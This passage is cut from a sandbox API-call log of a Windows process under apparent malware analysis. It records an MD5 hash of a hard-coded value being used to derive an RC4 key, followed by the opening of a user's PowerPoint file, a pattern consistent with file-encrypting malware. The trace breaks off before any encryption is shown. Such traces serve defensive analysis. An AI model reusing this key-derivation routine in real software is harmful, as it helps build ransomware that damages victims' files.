hHeap=0x2af0000) returned 1 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.258] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0215.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0215.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.258] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.259] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.259] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.259] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.259] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.259] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0215.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0215.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0215.259] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bef0) returned 1 [0215.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.260] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0215.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.260] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0215.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.260] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.260] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.260] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.261] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.261] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0215.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.261] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0215.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.261] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.262] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.263] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.263] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.263] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.263] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.263] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.263] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.263] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.263] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.264] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.264] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.264] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.264] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.264] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.264] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.264] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.264] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.264] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.264] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.264] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.264] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabcc8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0215.265] CryptCreateHash (in: hProv=0xa7bef0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0215.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72648, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.265] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0215.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a726a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.265] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.265] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.265] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.265] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.265] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.266] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0215.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabc50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0215.266] CryptHashData (hHash=0x9e2138, pbData=0x2a72778, dwDataLen=0x3, dwFlags=0x1) returned 1 [0215.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.266] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.266] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.266] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.266] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.266] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.266] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.266] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.266] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.266] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.267] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.267] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabb48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0215.267] CryptDeriveKey (in: hProv=0xa7bef0, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1d38) returned 1 [0215.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.267] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.267] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.267] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.267] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.268] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.268] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0215.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7040, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0215.268] CryptDestroyHash (hHash=0x9e2138) returned 1 [0215.268] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.269] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Ax_c.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\ax_c.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0215.270] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.270] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0215.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0215.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.270] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, 